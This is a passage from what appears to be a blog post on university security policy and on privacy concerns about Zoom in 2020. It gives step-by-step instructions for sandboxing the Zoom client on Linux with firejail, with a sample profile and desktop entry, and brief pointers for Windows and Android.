The technological part of the solution should develop sensible threat models based on attack and usage statistics. It should be governed by real risks rather than a desire to just protect everything quickly and at all costs. Some of the restrictions already applied could be relaxed. A reasonable solution is to apply a more sensible score-based security mechanism, e.g. including IP-based rules for two-factor or two-step authentication. Some of the more secure services could, for example, be available without firewall restriction if the user comes from his or her frequently used Norwegian home IP address (improving usability while still reducing the potential attack surface); a small sketch of this idea is given below. This efficiently transforms the jail into a continuum adapting to the threat and uncertainty level. It would also pay off to demonstrate the practical benefits of client-side certificate authentication, OAuth2 and similar more phishing-resistant security token mechanisms (e.g. they can relax the need for TOTP/SMS authentication) to all users. The university should also facilitate much wider use of hardware-based authentication devices, such as the YubiKey, for proper two-factor authentication, perhaps even distributing such devices freely in some groups if universal deployment turns out to be expensive. Such personal identity verification hardware devices are actually a crucial component of modern zero-trust security approaches.
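As a tiny illustration of such score- or origin-based relaxation, sshd alone can already express "strong single factor from a trusted network, two factors from everywhere else" (an sshd_config fragment; the address range and the chosen methods are illustrative only):

# Key-only login from the campus network (illustrative range):
Match Address 129.177.0.0/16
    AuthenticationMethods publickey
# Key plus an interactive second factor from everywhere else:
Match all
    AuthenticationMethods publickey,keyboard-interactive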

The crucial element of the whole policy is to create incentives for using more secure tools. For example, the use of hardware personal identity verification tokens could allow bypassing all or most restrictions, perhaps even the need for a VPN. There would currently be little added risk with such a policy, but the users would be much happier to do their work securely whenever they need, without hassle. This would require hard work, additional integration and funding. But educating, helping and cooperating with users--not restricting and obstructing them--is the only viable strategy for achieving increased security in the university environment in reality, not just on paper.

Apr 03, 2020

Is Zoom safe to use? Is the company marketing and other information correct, and can it be trusted?

Zoom privacy and security problems

Zoom has demonstrated significant negligence with respect to cybersecurity. Additionally, the company has run aggressive marketing campaigns and has been caught providing false information to its end users.

  • Zoom aggressively forces the user to download and install a native application rather than use the web browser for videoconferencing, even though videoconferences work in the web browser. This is a little suspicious. Browser-based conferences are more convenient for an occasional user and are safer due to the browser's sandboxing of network applications.

  • A serious security deficiency on the Apple Mac platform allowed any unauthorized remote attacker to activate the web camera, connect the user to a conference and execute a denial-of-service attack. Zoom tried to ignore and deliberately hide information about this very serious security vulnerability and was slow to fix it. See here for more details, and here (technical information is here and here). Zoom management's response seems to point to a quite irresponsible corporate culture.

  • More recently it turned out that Zoom was sending users' data to Facebook servers without the users' consent. This is now fixed. See the Vice article and this follow-up.

  • Zoom was caught providing false and misleading information that its videoconferences have "end-to-end" encryption while this was not so. Check out this. The explanation provided by Zoom is unsatisfactory.

  • Zoom had a serious security vulnerability that could lead to a user password leak in Microsoft Windows. See here for details.

  • Zoom has a strange privacy policy that, even though it states that "privacy is very important to us," requires quite a large collection of private user information. There is little explanation of why this information is collected. Unlike many other similar companies, Zoom does not release transparency reports. See here: https://zoom.us/privacy

  • The Electronic Privacy Information Center (EPIC) has filed a complaint with the FTC,

    • alleging that the videoconferencing company Zoom has committed unfair and deceptive practices in violation of the FTC Act. According to EPIC, Zoom intentionally designed its web conferencing service to bypass browser security settings and remotely enable a user's web camera without the knowledge or consent of the user.

  • See more details here

  • There is growing concern about the privacy deficiencies in Zoom; for more details see this and this. Also see The Guardian.

  • Recently SpaceX banned Zoom because of privacy concerns; see here for details.

  • Zoom has close links with China. Even though the intellectual property, management and marketing are based in the USA, many if not most developers and engineers are based in China (see the Form S-1 registration statement). This can potentially lead to serious privacy and cybersecurity issues, given the Chinese regime's tightening of Internet regulation (censorship, privacy etc.). One example is the MLPS 2.0 legislation of 2019, which mandates that residents of China and any foreign companies operating there provide the authorities with unrestricted access to user data. (In China, Zoom has a network of agents acting under different names but using the same platform.)

Updates: More on Zoom problems

How to increase privacy and security of using Zoom on Linux

Sandboxing. On the Linux platform, one solution is to always run the Zoom videoconferencing software in a limited sandbox. Then the Zoom client has no access to the user's files and the other processes running on the system.

  • Update: This recipe works for Zoom v. 3.5.361645.0301, but not for some later versions, e.g. 3.5.374815.0324; see the update below on this.

Disable any unauthorized update/upgrade of the Zoom client. Do not install the Zoom software from the standard repository. Use the static tar.gz archive instead: select "Other Linux OS" for installation and uncompress the static distribution into a safe directory. The disadvantage is that updates are manual only: check the Zoom web site for new releases and read the changelog. The advantage is that Zoom cannot silently install any unauthorized update or software on the system.
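For example (file and directory names are illustrative; the archive itself is downloaded manually from the Zoom web site):

# Unpack the static "Other Linux OS" archive into a directory under
# the user's own control; nothing can then be updated silently.
tar -xzf zoom_x86_64.tar.gz -C ~/bin/
# The client is afterwards started manually from ~/bin/zoom/ZoomLauncher.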

It also makes sense to register at Zoom with the institutional email but with a separate password, so that Zoom does not use the main institutional login (SSO login). This might help against credential leaks in case of a Zoom software vulnerability. Using the institutional email to register ensures that the account is registered as "licensed."

Install firejail sandboxing (https://firejail.wordpress.com/):

sudo apt install firejail

  • Firejail is a SUID program that reduces the risk of security breaches by restricting the running environment of untrusted applications using Linux namespaces and seccomp-bpf. ... Firejail can sandbox any type of processes: servers, graphical applications, and even user login sessions. The software includes security profiles for a large number of Linux programs: Mozilla Firefox, Chromium, VLC, Transmission etc. To start the sandbox, prefix your command with “firejail.”

Make a configuration file for Zoom in .config/firejail/. Here is the configuration file, named after the main Zoom executable: ZoomLauncher.profile (given that the running executable is ZoomLauncher):

# Note: to delete all firejail profiles for all local trusted apps
#  run sudo firecfg --clean
# ----------------------------------------------------------------
# Duplication of zoom configs in noblacklist and whitelist
# sections fixes login credentials no save problem:
noblacklist ${HOME}/.config/zoomus.conf
noblacklist ${HOME}/.zoom
include /etc/firejail/disable-common.inc
include /etc/firejail/disable-devel.inc
include /etc/firejail/disable-programs.inc
include /etc/firejail/disable-passwdmgr.inc
whitelist ${HOME}/bin/zoom
whitelist ${HOME}/.config/zoomus.conf
whitelist ${HOME}/.zoom
whitelist ${HOME}/.cache/zoom
whitelist ${HOME}/downloads
include /etc/firejail/whitelist-common.inc
caps.drop all
netfilter
nodvd
nonewprivs
noroot
notv
protocol unix,inet,inet6
seccomp
private-tmp
# Needed for latest versions of Zoom and perhaps certain other Qt/QML apps
env QML_DISABLE_DISK_CACHE=1

Now Zoom client can be started from the firejail sandbox:

firejail /path_to_safe_install_location/bin/zoom/ZoomLauncher

To make it possible to use the standard graphical menus, one needs to create a zoom.desktop startup file in the user's directory .local/share/applications. The Exec entry of the file must include the firejail-based startup:

[Desktop Entry]
Name=Zoom Desktop [Jailed]
GenericName=Zoom videoconferencing
Comment=Zoom Desktop Client jailed
Exec=firejail /path_to_safe_install_location/bin/zoom/ZoomLauncher %f
Icon=zoom.png
Terminal=false
Type=Application
Categories=Network;Internet;Education;Qt;
X-SuSE-translate=false

Firejail caveats

Firejail can end up running all of the user's applications in its jail, which is often too restrictive (e.g. settings are not saved).

  • To force reconfiguring all applications to run in firejail, do this (do not do it if you are unsure):

    sudo firecfg

  • To disable configuring all local applications to run in jail, do this:

    sudo firecfg --clean

  • Run sudo firecfg --clean if you have problems starting applications after installing firejail.

  • To check whether an application starts in a jail by default, run it from the terminal. If the terminal shows several lines like Reading profile /etc/firejail/disable-common.inc, then the application runs in a jail.
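Alternatively, firejail can report all currently running sandboxes directly:

firejail --list    # one line per sandbox, with PID and command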

A newer version of the Zoom client (3.5.374815.0324) refused to run in the jailed environment and hung.

A workaround for running recent Zoom versions in the jail is to add the line

env QML_DISABLE_DISK_CACHE=1

to the firejail config file.

  • QML_DISABLE_DISK_CACHE: Disables the disk cache and forces re-compilation from source for all QML and JavaScript files (from the QML Documentation)

How to increase privacy and security of using Zoom on Microsoft Windows

Here is a link about the sandbox in Windows 10: How to use Windows sandbox.

I have not tested how this works.

Android sandbox

For Android, one solution is to use the open source Shelter application; mobile Zoom can then run in a secure container.

I have been running several programs that I do not want to give access to my data inside Shelter. It works fine for me.

Advantages:

  • Contacts (the address book) are not leaked to Zoom if a separate address book is used within Shelter

  • All apps can be frozen to keep them from running all the time in the background; this reduces the chances of data leaks as well as battery drain. Freezing can happen automatically, after a timeout.
